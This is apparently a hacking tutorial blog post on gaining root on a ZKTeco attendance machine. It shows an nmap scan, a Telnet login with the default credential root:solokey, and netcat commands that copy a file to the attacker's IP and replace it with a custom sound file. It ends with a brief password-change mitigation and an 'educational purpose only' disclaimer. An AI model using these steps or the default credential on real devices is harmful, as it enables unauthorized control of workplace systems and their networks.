What is the very first thought that comes to your mind when you see an Attendance Machine ??
Whether you are a student or a professional, the very first thought is Why Why me God… Was there even a need for the so called Office Attendance Machines…??!! The one thing which follows us like our shadow is not our soul mate, twin flame and all but this Attendance machine… Chillax!! IoT devices can be hacked in minutes. Today we are going to hack into one such device – ZKTeco Office Attendance Machine…
Welcome to the realm of Hacking… The future of the hacking lies in IoT hacking. Just as the internet connects people, the Internet of Things connects devices and help them communicate.
Today, We will gain access and change the normal behaviour of this Attendance machine.
So, Let’s find out whether this “Smart” device is actually smart or not..? 😉 In just ten simple steps Yes…!! You heard it right, In just ten steps we will hack into the system and smartness of the device would be at crucnh.. 😀
The first step is to scan the network and find IP of the device. For this, you can use nmap or Zenmap.
Here we are using nmap. The attacker IP is 192.168.1.58 and the victims IP is 192.168.1.101.
Now we will do port scanning on victims IP. Port scanning is a technique through which we can find the open ports and target the victim.
Command: Nmap –sV –p- 192.168.1.101 (victims IP)
From the above command, we fetched the output wherein we found that Telnet port is open.
i.e Port no: 23
In the second step, we will try to connect using default passwords.
Here is a list of Telnet Default passwords.. 😉
One of the combinations which worked for us is root:solokey.
The third step is to check for privileges.
Command to check current user: id
The output of the above command is root.
Now, in fourth step we will check for running processes to find the process useful for us.
Command ps is used to find running processes.
Through this, we found an unusual process. /mnt/mtdblock/main
Fifth step is to get into /mnt/mtdblock
In /mnt/mdtblock, We found options.cfg which looks like configuration file. What are we waiting for..?? Lets dig into it.
Command: cat file_name. Here options.cfg
Sixth step is to dig into configuration file.
Here we found some public IPs, ports and user configurations.
Its time to play.
Command: cd wav
In seventh step, we found the wav sound file. This will help us further in changing the behaviour of the smart machine
Now through netcat, we will transfer the E_0.wav file.
To do that we started a netcat listener on port 4444 on attackers system, we need to store out put of the command in E_0.wav because when we transfer file via netcat, it only transfers data in raw form.
Here, is the wav file which we got from victim’s system. The monotonous sound of “Thank You” … :((
Command: ncat –lvnp 4444 > E_0.wav
Let’s get rid of this boring “Thank You” sound.. Let’s play with the machine..!!! 😉
Now in eight step, we will send the file from victim machine to the attackers system. To do that, use following command on victim system and we will specify E_0.wav file as an input.
Nc 192.168.1.58 4444 < E_0.wav
Now, we fetched the file on attackers system. we will use dir command to check filesize.
So, now we will generate custom wav file.. 😉
In step number nine, we will generate custom wav file.For that we will use free online website to generate wav file from text and then, rename it to E_0.wav. Lets remove the original file from victim machine using rm command. Now we will start netcat listener on victim machine on port 4444. Now we will save the output of listener in wav file.
Command: nc –lp 4444> E_0.wav
The tenth and the final step is to send our new E_0.wav to victim machine using following command.
Ncat 192.168.1.101 4444 < E_0.wav
And bingo, we have changed the sound of the Attendance machine.
Impact of the IoT device hacking
- In this case, we are directly getting access of root, meaning we can take full control over it.
- If the attacker reaches router’s IP through this so called smart device like cameras, attendance machine, Smart Television, he can easily gain credentials of router through rainbow table tool.
- Once, the attacker has access to router, whole network is under the attacker’s control.
Solution to keep intruders away
- If you are using the same device at your school, university or work place, the solution to keep away from hackers/attackers is to change the default password of telnet.
Note: “This is for educational purpose only”. The exploiting use of this can land you in legal troubles. Always choose to learn and help other’s rather than landing in any kind of felony.